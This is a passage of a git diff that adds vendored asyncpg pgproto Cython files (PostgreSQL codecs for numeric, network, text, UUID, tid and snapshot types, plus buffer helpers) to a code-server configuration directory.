b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/jsonpath.pyx new file mode 100755 index 0000000..610b30d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/jsonpath.pyx @@ -0,0 +1,29 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef jsonpath_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + char *str + ssize_t size + + as_pg_string_and_size(settings, obj, &str, &size) + + if size > 0x7fffffff - 1: + raise ValueError('string too long') + + buf.write_int32(size + 1) + buf.write_byte(1) # jsonpath format version + buf.write_cstr(str, size) + + +cdef jsonpath_decode(CodecContext settings, FRBuffer *buf): + cdef uint8_t format = (frb_read(buf, 1)[0]) + + if format != 1: + raise ValueError('unexpected jsonpath format: {}'.format(format)) + + return text_decode(settings, buf) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/misc.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/misc.pyx new file mode 100755 index 0000000..99b19c9 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/misc.pyx @@ -0,0 +1,16 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef void_encode(CodecContext settings, WriteBuffer buf, obj): + # Void is zero bytes + buf.write_int32(0) + + +cdef void_decode(CodecContext settings, FRBuffer *buf): + # Do nothing; void will be passed as NULL so this function + # will never be called. + pass diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/network.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/network.pyx new file mode 100755 index 0000000..730c947 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/network.pyx @@ -0,0 +1,139 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +import ipaddress + + +# defined in postgresql/src/include/inet.h +# +DEF PGSQL_AF_INET = 2 # AF_INET +DEF PGSQL_AF_INET6 = 3 # AF_INET + 1 + + +_ipaddr = ipaddress.ip_address +_ipiface = ipaddress.ip_interface +_ipnet = ipaddress.ip_network + + +cdef inline uint8_t _ip_max_prefix_len(int32_t family): + # Maximum number of bits in the network prefix of the specified + # IP protocol version. + if family == PGSQL_AF_INET: + return 32 + else: + return 128 + + +cdef inline int32_t _ip_addr_len(int32_t family): + # Length of address in bytes for the specified IP protocol version. + if family == PGSQL_AF_INET: + return 4 + else: + return 16 + + +cdef inline int8_t _ver_to_family(int32_t version): + if version == 4: + return PGSQL_AF_INET + else: + return PGSQL_AF_INET6 + + +cdef inline _net_encode(WriteBuffer buf, int8_t family, uint32_t bits, + int8_t is_cidr, bytes addr): + + cdef: + char *addrbytes + ssize_t addrlen + + cpython.PyBytes_AsStringAndSize(addr, &addrbytes, &addrlen) + + buf.write_int32(4 + addrlen) + buf.write_byte(family) + buf.write_byte(bits) + buf.write_byte(is_cidr) + buf.write_byte(addrlen) + buf.write_cstr(addrbytes, addrlen) + + +cdef net_decode(CodecContext settings, FRBuffer *buf, bint as_cidr): + cdef: + int32_t family = frb_read(buf, 1)[0] + uint8_t bits = frb_read(buf, 1)[0] + int prefix_len + int32_t is_cidr = frb_read(buf, 1)[0] + int32_t addrlen = frb_read(buf, 1)[0] + bytes addr + uint8_t max_prefix_len = _ip_max_prefix_len(family) + + if is_cidr != as_cidr: + raise ValueError('unexpected CIDR flag set in non-cidr value') + + if family != PGSQL_AF_INET and family != PGSQL_AF_INET6: + raise ValueError('invalid address family in "{}" value'.format( + 'cidr' if is_cidr else 'inet' + )) + + max_prefix_len = _ip_max_prefix_len(family) + + if bits > max_prefix_len: + raise ValueError('invalid network prefix length in "{}" value'.format( + 'cidr' if is_cidr else 'inet' + )) + + if addrlen != _ip_addr_len(family): + raise ValueError('invalid address length in "{}" value'.format( + 'cidr' if is_cidr else 'inet' + )) + + addr = cpython.PyBytes_FromStringAndSize(frb_read(buf, addrlen), addrlen) + + if as_cidr or bits != max_prefix_len: + prefix_len = cpython.PyLong_FromLong(bits) + + if as_cidr: + return _ipnet((addr, prefix_len)) + else: + return _ipiface((addr, prefix_len)) + else: + return _ipaddr(addr) + + +cdef cidr_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + object ipnet + int8_t family + + ipnet = _ipnet(obj) + family = _ver_to_family(ipnet.version) + _net_encode(buf, family, ipnet.prefixlen, 1, ipnet.network_address.packed) + + +cdef cidr_decode(CodecContext settings, FRBuffer *buf): + return net_decode(settings, buf, True) + + +cdef inet_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + object ipaddr + int8_t family + + try: + ipaddr = _ipaddr(obj) + except ValueError: + # PostgreSQL accepts *both* CIDR and host values + # for the host datatype. + ipaddr = _ipiface(obj) + family = _ver_to_family(ipaddr.version) + _net_encode(buf, family, ipaddr.network.prefixlen, 1, ipaddr.packed) + else: + family = _ver_to_family(ipaddr.version) + _net_encode(buf, family, _ip_max_prefix_len(family), 0, ipaddr.packed) + + +cdef inet_decode(CodecContext settings, FRBuffer *buf): + return net_decode(settings, buf, False) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/numeric.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/numeric.pyx new file mode 100755 index 0000000..b75d096 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/numeric.pyx @@ -0,0 +1,356 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc.math cimport abs, log10 +from libc.stdio cimport snprintf + +import decimal + +# defined in postgresql/src/backend/utils/adt/numeric.c +DEF DEC_DIGITS = 4 +DEF MAX_DSCALE = 0x3FFF +DEF NUMERIC_POS = 0x0000 +DEF NUMERIC_NEG = 0x4000 +DEF NUMERIC_NAN = 0xC000 +DEF NUMERIC_PINF = 0xD000 +DEF NUMERIC_NINF = 0xF000 + +_Dec = decimal.Decimal + + +cdef numeric_encode_text(CodecContext settings, WriteBuffer buf, obj): + text_encode(settings, buf, str(obj)) + + +cdef numeric_decode_text(CodecContext settings, FRBuffer *buf): + return _Dec(text_decode(settings, buf)) + + +cdef numeric_encode_binary(CodecContext settings, WriteBuffer buf, obj): + cdef: + object dec + object dt + int64_t exponent + int64_t i + int64_t j + tuple pydigits + int64_t num_pydigits + int16_t pgdigit + int64_t num_pgdigits + int16_t dscale + int64_t dweight + int64_t weight + uint16_t sign + int64_t padding_size = 0 + + if isinstance(obj, _Dec): + dec = obj + else: + dec = _Dec(obj) + + dt = dec.as_tuple() + + if dt.exponent == 'n' or dt.exponent == 'N': + # NaN + sign = NUMERIC_NAN + num_pgdigits = 0 + weight = 0 + dscale = 0 + elif dt.exponent == 'F': + # Infinity + if dt.sign: + sign = NUMERIC_NINF + else: + sign = NUMERIC_PINF + num_pgdigits = 0 + weight = 0 + dscale = 0 + else: + exponent = dt.exponent + if exponent < 0 and -exponent > MAX_DSCALE: + raise ValueError( + 'cannot encode Decimal value into numeric: ' + 'exponent is too small') + + if dt.sign: + sign = NUMERIC_NEG + else: + sign = NUMERIC_POS + + pydigits = dt.digits + num_pydigits = len(pydigits) + + dweight = num_pydigits + exponent - 1 + if dweight >= 0: + weight = (dweight + DEC_DIGITS) // DEC_DIGITS - 1 + else: + weight = -((-dweight - 1) // DEC_DIGITS + 1) + + if weight > 2 ** 16 - 1: + raise ValueError( + 'cannot encode Decimal value into numeric: ' + 'exponent is too large') + + padding_size = \ + (weight + 1) * DEC_DIGITS - (dweight + 1) + num_pgdigits = \ + (num_pydigits + padding_size + DEC_DIGITS - 1) // DEC_DIGITS + + if num_pgdigits > 2 ** 16 - 1: + raise ValueError( + 'cannot encode Decimal value into numeric: ' + 'number of digits is too large') + + # Pad decimal digits to provide room for correct Postgres + # digit alignment in the digit computation loop. + pydigits = (0,) * DEC_DIGITS + pydigits + (0,) * DEC_DIGITS + + if exponent < 0: + if -exponent > MAX_DSCALE: + raise ValueError( + 'cannot encode Decimal value into numeric: ' + 'exponent is too small') + dscale = -exponent + else: + dscale = 0 + + buf.write_int32(2 + 2 + 2 + 2 + 2 * num_pgdigits) + buf.write_int16(num_pgdigits) + buf.write_int16(weight) + buf.write_int16(sign) + buf.write_int16(dscale) + + j = DEC_DIGITS - padding_size + + for i in range(num_pgdigits): + pgdigit = (pydigits[j] * 1000 + pydigits[j + 1] * 100 + + pydigits[j + 2] * 10 + pydigits[j + 3]) + j += DEC_DIGITS + buf.write_int16(pgdigit) + + +# The decoding strategy here is to form a string representation of +# the numeric var, as it is faster than passing an iterable of digits. +# For this reason the below code is pure overhead and is ~25% slower +# than the simple text decoder above. That said, we need the binary +# decoder to support binary COPY with numeric values. +cdef numeric_decode_binary_ex( + CodecContext settings, + FRBuffer *buf, + bint trail_fract_zero, +): + cdef: + uint16_t num_pgdigits = hton.unpack_int16(frb_read(buf, 2)) + int16_t weight = hton.unpack_int16(frb_read(buf, 2)) + uint16_t sign = hton.unpack_int16(frb_read(buf, 2)) + uint16_t dscale = hton.unpack_int16(frb_read(buf, 2)) + int16_t pgdigit0 + ssize_t i + int16_t pgdigit + object pydigits + ssize_t num_pydigits + ssize_t actual_num_pydigits + ssize_t buf_size + int64_t exponent + int64_t abs_exponent + ssize_t exponent_chars + ssize_t front_padding = 0 + ssize_t num_fract_digits + ssize_t trailing_fract_zeros_adj + char smallbuf[_NUMERIC_DECODER_SMALLBUF_SIZE] + char *charbuf + char *bufptr + bint buf_allocated = False + + if sign == NUMERIC_NAN: + # Not-a-number + return _Dec('NaN') + elif sign == NUMERIC_PINF: + # +Infinity + return _Dec('Infinity') + elif sign == NUMERIC_NINF: + # -Infinity + return _Dec('-Infinity') + + if num_pgdigits == 0: + # Zero + return _Dec('0e-' + str(dscale)) + + pgdigit0 = hton.unpack_int16(frb_read(buf, 2)) + if weight >= 0: + if pgdigit0 < 10: + front_padding = 3 + elif pgdigit0 < 100: + front_padding = 2 + elif pgdigit0 < 1000: + front_padding = 1 + + # The number of fractional decimal digits actually encoded in + # base-DEC_DEIGITS digits sent by Postgres. + num_fract_digits = (num_pgdigits - weight - 1) * DEC_DIGITS + + # The trailing zero adjustment necessary to obtain exactly + # dscale number of fractional digits in output. May be negative, + # which indicates that trailing zeros in the last input digit + # should be discarded. + trailing_fract_zeros_adj = dscale - num_fract_digits + + # Maximum possible number of decimal digits in base 10. + # The actual number might be up to 3 digits smaller due to + # leading zeros in first input digit. + num_pydigits = num_pgdigits * DEC_DIGITS + if trailing_fract_zeros_adj > 0: + num_pydigits += trailing_fract_zeros_adj + + # Exponent. + exponent = (weight + 1) * DEC_DIGITS - front_padding + abs_exponent = abs(exponent) + if abs_exponent != 0: + # Number of characters required to render absolute exponent value + # in decimal. + exponent_chars = log10(abs_exponent) + 1 + else: + exponent_chars = 0 + + # Output buffer size. + buf_size = ( + 1 + # sign + 1 + # leading zero + 1 + # decimal dot + num_pydigits + # digits + 1 + # possible trailing zero padding + 2 + # exponent indicator (E-,E+) + exponent_chars + # exponent + 1 # null terminator char + ) + + if buf_size > _NUMERIC_DECODER_SMALLBUF_SIZE: + charbuf = cpython.PyMem_Malloc(buf_size) + buf_allocated = True + else: + charbuf = smallbuf + + try: + bufptr = charbuf + + if sign == NUMERIC_NEG: + bufptr[0] = b'-' + bufptr += 1 + + bufptr[0] = b'0' + bufptr[1] = b'.' + bufptr += 2 + + if weight >= 0: + bufptr = _unpack_digit_stripping_lzeros(bufptr, pgdigit0) + else: + bufptr = _unpack_digit(bufptr, pgdigit0) + + for i in range(1, num_pgdigits): + pgdigit = hton.unpack_int16(frb_read(buf, 2)) + bufptr = _unpack_digit(bufptr, pgdigit) + + if dscale: + if trailing_fract_zeros_adj > 0: + for i in range(trailing_fract_zeros_adj): + bufptr[i] = b'0' + + # If display scale is _less_ than the number of rendered digits, + # trailing_fract_zeros_adj will be negative and this will strip + # the excess trailing zeros. + bufptr += trailing_fract_zeros_adj + + if trail_fract_zero: + # Check if the number of rendered digits matches the exponent, + # and if so, add another trailing zero, so the result always + # appears with a decimal point. + actual_num_pydigits = bufptr - charbuf - 2 + if sign == NUMERIC_NEG: + actual_num_pydigits -= 1 + + if actual_num_pydigits == abs_exponent: + bufptr[0] = b'0' + bufptr += 1 + + if exponent != 0: + bufptr[0] = b'E' + if exponent < 0: + bufptr[1] = b'-' + else: + bufptr[1] = b'+' + bufptr += 2 + snprintf(bufptr, exponent_chars + 1, '%d', + abs_exponent) + bufptr += exponent_chars + + bufptr[0] = 0 + + pydigits = cpythonx.PyUnicode_FromString(charbuf) + + return _Dec(pydigits) + + finally: + if buf_allocated: + cpython.PyMem_Free(charbuf) + + +cdef numeric_decode_binary(CodecContext settings, FRBuffer *buf): + return numeric_decode_binary_ex(settings, buf, False) + + +cdef inline char *_unpack_digit_stripping_lzeros(char *buf, int64_t pgdigit): + cdef: + int64_t d + bint significant + + d = pgdigit // 1000 + significant = (d > 0) + if significant: + pgdigit -= d * 1000 + buf[0] = (d + b'0') + buf += 1 + + d = pgdigit // 100 + significant |= (d > 0) + if significant: + pgdigit -= d * 100 + buf[0] = (d + b'0') + buf += 1 + + d = pgdigit // 10 + significant |= (d > 0) + if significant: + pgdigit -= d * 10 + buf[0] = (d + b'0') + buf += 1 + + buf[0] = (pgdigit + b'0') + buf += 1 + + return buf + + +cdef inline char *_unpack_digit(char *buf, int64_t pgdigit): + cdef: + int64_t d + + d = pgdigit // 1000 + pgdigit -= d * 1000 + buf[0] = (d + b'0') + + d = pgdigit // 100 + pgdigit -= d * 100 + buf[1] = (d + b'0') + + d = pgdigit // 10 + pgdigit -= d * 10 + buf[2] = (d + b'0') + + buf[3] = (pgdigit + b'0') + buf += 4 + + return buf diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/pg_snapshot.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/pg_snapshot.pyx new file mode 100755 index 0000000..d96107c --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/pg_snapshot.pyx @@ -0,0 +1,63 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef pg_snapshot_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + ssize_t nxip + uint64_t xmin + uint64_t xmax + int i + WriteBuffer xip_buf = WriteBuffer.new() + + if not (cpython.PyTuple_Check(obj) or cpython.PyList_Check(obj)): + raise TypeError( + 'list or tuple expected (got type {})'.format(type(obj))) + + if len(obj) != 3: + raise ValueError( + 'invalid number of elements in txid_snapshot tuple, expecting 4') + + nxip = len(obj[2]) + if nxip > _MAXINT32: + raise ValueError('txid_snapshot value is too long') + + xmin = obj[0] + xmax = obj[1] + + for i in range(nxip): + xip_buf.write_int64( + cpython.PyLong_AsUnsignedLongLong(obj[2][i])) + + buf.write_int32(20 + xip_buf.len()) + + buf.write_int32(nxip) + buf.write_int64(xmin) + buf.write_int64(xmax) + buf.write_buffer(xip_buf) + + +cdef pg_snapshot_decode(CodecContext settings, FRBuffer *buf): + cdef: + int32_t nxip + uint64_t xmin + uint64_t xmax + tuple xip_tup + int32_t i + object xip + + nxip = hton.unpack_int32(frb_read(buf, 4)) + xmin = hton.unpack_int64(frb_read(buf, 8)) + xmax = hton.unpack_int64(frb_read(buf, 8)) + + xip_tup = cpython.PyTuple_New(nxip) + for i in range(nxip): + xip = cpython.PyLong_FromUnsignedLongLong( + hton.unpack_int64(frb_read(buf, 8))) + cpython.Py_INCREF(xip) + cpython.PyTuple_SET_ITEM(xip_tup, i, xip) + + return (xmin, xmax, xip_tup) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/text.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/text.pyx new file mode 100755 index 0000000..79f375d --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/text.pyx @@ -0,0 +1,48 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef inline as_pg_string_and_size( + CodecContext settings, obj, char **cstr, ssize_t *size): + + if not cpython.PyUnicode_Check(obj): + raise TypeError('expected str, got {}'.format(type(obj).__name__)) + + if settings.is_encoding_utf8(): + cstr[0] = cpythonx.PyUnicode_AsUTF8AndSize(obj, size) + else: + encoded = settings.get_text_codec().encode(obj)[0] + cpython.PyBytes_AsStringAndSize(encoded, cstr, size) + + if size[0] > 0x7fffffff: + raise ValueError('string too long') + + +cdef text_encode(CodecContext settings, WriteBuffer buf, obj): + cdef: + char *str + ssize_t size + + as_pg_string_and_size(settings, obj, &str, &size) + + buf.write_int32(size) + buf.write_cstr(str, size) + + +cdef inline decode_pg_string(CodecContext settings, const char* data, + ssize_t len): + + if settings.is_encoding_utf8(): + # decode UTF-8 in strict mode + return cpython.PyUnicode_DecodeUTF8(data, len, NULL) + else: + bytes = cpython.PyBytes_FromStringAndSize(data, len) + return settings.get_text_codec().decode(bytes)[0] + + +cdef text_decode(CodecContext settings, FRBuffer *buf): + cdef ssize_t buf_len = buf.len + return decode_pg_string(settings, frb_read_all(buf), buf_len) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/tid.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/tid.pyx new file mode 100755 index 0000000..b39bddc --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/tid.pyx @@ -0,0 +1,51 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef tid_encode(CodecContext settings, WriteBuffer buf, obj): + cdef int overflow = 0 + cdef unsigned long block, offset + + if not (cpython.PyTuple_Check(obj) or cpython.PyList_Check(obj)): + raise TypeError( + 'list or tuple expected (got type {})'.format(type(obj))) + + if len(obj) != 2: + raise ValueError( + 'invalid number of elements in tid tuple, expecting 2') + + try: + block = cpython.PyLong_AsUnsignedLong(obj[0]) + except OverflowError: + overflow = 1 + + # "long" and "long long" have the same size for x86_64, need an extra check + if overflow or (sizeof(block) > 4 and block > UINT32_MAX): + raise OverflowError('tuple id block value out of uint32 range') + + try: + offset = cpython.PyLong_AsUnsignedLong(obj[1]) + overflow = 0 + except OverflowError: + overflow = 1 + + if overflow or offset > 65535: + raise OverflowError('tuple id offset value out of uint16 range') + + buf.write_int32(6) + buf.write_int32(block) + buf.write_int16(offset) + + +cdef tid_decode(CodecContext settings, FRBuffer *buf): + cdef: + uint32_t block + uint16_t offset + + block = hton.unpack_int32(frb_read(buf, 4)) + offset = hton.unpack_int16(frb_read(buf, 2)) + + return (block, offset) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/uuid.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/uuid.pyx new file mode 100755 index 0000000..0bc4567 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/codecs/uuid.pyx @@ -0,0 +1,27 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef uuid_encode(CodecContext settings, WriteBuffer wbuf, obj): + cdef: + char buf[16] + + if type(obj) is pg_UUID: + wbuf.write_int32(16) + wbuf.write_cstr((obj)._data, 16) + elif cpython.PyUnicode_Check(obj): + pg_uuid_bytes_from_str(obj, buf) + wbuf.write_int32(16) + wbuf.write_cstr(buf, 16) + else: + bytea_encode(settings, wbuf, obj.bytes) + + +cdef uuid_decode(CodecContext settings, FRBuffer *buf): + if buf.len != 16: + raise TypeError( + f'cannot decode UUID, expected 16 bytes, got {buf.len}') + return pg_uuid_from_buf(frb_read_all(buf)) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/consts.pxi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/consts.pxi new file mode 100755 index 0000000..68bf31f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/consts.pxi @@ -0,0 +1,9 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +DEF _MAXINT32 = 2**31 - 1 +DEF _NUMERIC_DECODER_SMALLBUF_SIZE = 256 diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/cpythonx.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/cpythonx.pxd new file mode 100755 index 0000000..7b4f4f3 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/cpythonx.pxd @@ -0,0 +1,23 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from cpython cimport Py_buffer + +cdef extern from "Python.h": + int PyUnicode_1BYTE_KIND + + int PyByteArray_CheckExact(object) + int PyByteArray_Resize(object, ssize_t) except -1 + object PyByteArray_FromStringAndSize(const char *, ssize_t) + char* PyByteArray_AsString(object) + + object PyUnicode_FromString(const char *u) + const char* PyUnicode_AsUTF8AndSize( + object unicode, ssize_t *size) except NULL + + object PyUnicode_FromKindAndData( + int kind, const void *buffer, Py_ssize_t size) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/debug.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/debug.pxd new file mode 100755 index 0000000..5e59ec1 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/debug.pxd @@ -0,0 +1,10 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef extern from "debug.h": + + cdef int PG_DEBUG diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pxd new file mode 100755 index 0000000..9ff8d10 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pxd @@ -0,0 +1,48 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef: + + struct FRBuffer: + const char* buf + ssize_t len + + inline ssize_t frb_get_len(FRBuffer *frb): + return frb.len + + inline void frb_set_len(FRBuffer *frb, ssize_t new_len): + frb.len = new_len + + inline void frb_init(FRBuffer *frb, const char *buf, ssize_t len): + frb.buf = buf + frb.len = len + + inline const char* frb_read(FRBuffer *frb, ssize_t n) except NULL: + cdef const char *result + + frb_check(frb, n) + + result = frb.buf + frb.buf += n + frb.len -= n + + return result + + inline const char* frb_read_all(FRBuffer *frb): + cdef const char *result + result = frb.buf + frb.buf += frb.len + frb.len = 0 + return result + + inline FRBuffer *frb_slice_from(FRBuffer *frb, + FRBuffer* source, ssize_t len): + frb.buf = frb_read(source, len) + frb.len = len + return frb + + object frb_check(FRBuffer *frb, ssize_t n) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pyx new file mode 100755 index 0000000..f11f6b9 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/frb.pyx @@ -0,0 +1,12 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cdef object frb_check(FRBuffer *frb, ssize_t n): + if n > frb.len: + raise AssertionError( + f'insufficient data in buffer: requested {n} ' + f'remaining {frb.len}') diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/hton.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/hton.pxd new file mode 100755 index 0000000..9b73abc --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/hton.pxd @@ -0,0 +1,24 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc.stdint cimport int16_t, int32_t, uint16_t, uint32_t, int64_t, uint64_t + + +cdef extern from "./hton.h": + cdef void pack_int16(char *buf, int16_t x); + cdef void pack_int32(char *buf, int32_t x); + cdef void pack_int64(char *buf, int64_t x); + cdef void pack_float(char *buf, float f); + cdef void pack_double(char *buf, double f); + cdef int16_t unpack_int16(const char *buf); + cdef uint16_t unpack_uint16(const char *buf); + cdef int32_t unpack_int32(const char *buf); + cdef uint32_t unpack_uint32(const char *buf); + cdef int64_t unpack_int64(const char *buf); + cdef uint64_t unpack_uint64(const char *buf); + cdef float unpack_float(const char *buf); + cdef double unpack_double(const char *buf); diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.cpython-312-x86_64-linux-gnu.so b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.cpython-312-x86_64-linux-gnu.so new file mode 100755 index 0000000..b70be7f Binary files /dev/null and b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.cpython-312-x86_64-linux-gnu.so differ diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pxd new file mode 100755 index 0000000..ee9ec45 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pxd @@ -0,0 +1,19 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cimport cython +cimport cpython + +from libc.stdint cimport int16_t, int32_t, uint16_t, uint32_t, int64_t, uint64_t + + +include "./consts.pxi" +include "./frb.pxd" +include "./buffer.pxd" + + +include "./codecs/__init__.pxd" diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyi new file mode 100755 index 0000000..cbbcaec --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyi @@ -0,0 +1,20 @@ +import codecs +import typing +import uuid + +class CodecContext: + def get_text_codec(self) -> codecs.CodecInfo: ... + def get_json_decoder(self) -> object: ... + def get_json_encoder(self) -> object: ... + +@typing.final +class ReadBuffer: ... + +@typing.final +class WriteBuffer: ... + +class BufferError(Exception): ... + +@typing.final +class UUID(uuid.UUID): + def __init__(self, inp: typing.AnyStr) -> None: ... diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyx new file mode 100755 index 0000000..b880b7e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/pgproto.pyx @@ -0,0 +1,49 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +cimport cython +cimport cpython + +from . cimport cpythonx + +from libc.stdint cimport int8_t, uint8_t, int16_t, uint16_t, \ + int32_t, uint32_t, int64_t, uint64_t, \ + INT16_MIN, INT16_MAX, INT32_MIN, INT32_MAX, \ + UINT32_MAX, INT64_MIN, INT64_MAX, UINT64_MAX + + +from . cimport hton +from . cimport tohex + +from .debug cimport PG_DEBUG +from . import types as pgproto_types + + +include "./consts.pxi" +include "./frb.pyx" +include "./buffer.pyx" +include "./uuid.pyx" + +include "./codecs/context.pyx" + +include "./codecs/bytea.pyx" +include "./codecs/text.pyx" + +include "./codecs/datetime.pyx" +include "./codecs/float.pyx" +include "./codecs/int.pyx" +include "./codecs/json.pyx" +include "./codecs/jsonpath.pyx" +include "./codecs/uuid.pyx" +include "./codecs/numeric.pyx" +include "./codecs/bits.pyx" +include "./codecs/geometry.pyx" +include "./codecs/hstore.pyx" +include "./codecs/misc.pyx" +include "./codecs/network.pyx" +include "./codecs/tid.pyx" +include "./codecs/pg_snapshot.pyx" diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/tohex.pxd b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/tohex.pxd new file mode 100755 index 0000000..12fda84 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/pgproto/tohex.pxd @@ -0,0 +1,10 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 